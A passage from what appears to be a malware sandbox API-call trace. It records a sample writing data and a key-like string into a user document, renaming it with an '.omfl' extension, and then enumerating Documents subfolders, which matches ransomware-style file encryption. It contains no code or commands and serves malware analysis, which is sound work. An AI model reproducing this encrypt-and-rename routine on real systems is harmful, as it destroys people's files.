(in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173b8 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17370 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17358 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db9a0 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.039] WriteFile (in: hFile=0x610, lpBuffer=0xdd2f688*, nNumberOfBytesToWrite=0x417e, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2f688*, lpNumberOfBytesWritten=0xe00fb14*=0x417e, lpOverlapped=0x0) returned 1 [0132.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2f688 | out: hHeap=0x4970000) returned 1 [0132.039] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x4183, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.039] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.040] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.040] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.040] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.040] CloseHandle (hObject=0x610) returned 1 [0132.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0132.043] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\yjcbq7jIuq-w.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\yjcbq7jiuq-w.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\yjcbq7jIuq-w.odp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\yjcbq7jiuq-w.odp.omfl")) returned 1 [0132.044] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.044] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.044] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0132.046] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1411e0, ftCreationTime.dwHighDateTime=0x1d5da24, ftLastAccessTime.dwLowDateTime=0x32643690, ftLastAccessTime.dwHighDateTime=0x1d5e00e, ftLastWriteTime.dwLowDateTime=0x32643690, ftLastWriteTime.dwHighDateTime=0x1d5e00e, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjcbq7jIuq-w.odp", cAlternateFileName="YJCBQ7~1.ODP")) returned 0 [0132.046] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.046] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0132.046] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0132.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.050] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.050] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.050] PathFindFileNameW (pszPath="") returned="" [0132.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1411e0, ftCreationTime.dwHighDateTime=0x1d5da24, ftLastAccessTime.dwLowDateTime=0x32643690, ftLastAccessTime.dwHighDateTime=0x1d5e00e, ftLastWriteTime.dwLowDateTime=0x32643690, ftLastWriteTime.dwHighDateTime=0x1d5e00e, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjcbq7jIuq-w.odp", cAlternateFileName="YJCBQ7~1.ODP")) returned 0xffffffff [0132.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0132.051] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.051] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0132.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.051] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.051] PathFindFileNameW (pszPath="") returned="" [0132.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1411e0, ftCreationTime.dwHighDateTime=0x1d5da24, ftLastAccessTime.dwLowDateTime=0x32643690, ftLastAccessTime.dwHighDateTime=0x1d5e00e, ftLastWriteTime.dwLowDateTime=0x32643690, ftLastWriteTime.dwHighDateTime=0x1d5e00e, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjcbq7jIuq-w.odp", cAlternateFileName="YJCBQ7~1.ODP")) returned 0xffffffff [0132.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0132.052] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.052] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0132.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.052] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.052] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.052] PathFindFileNameW (pszPath="") returned="" [0132.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.053] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.053] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0132.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0132.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0132.053] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0132.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My 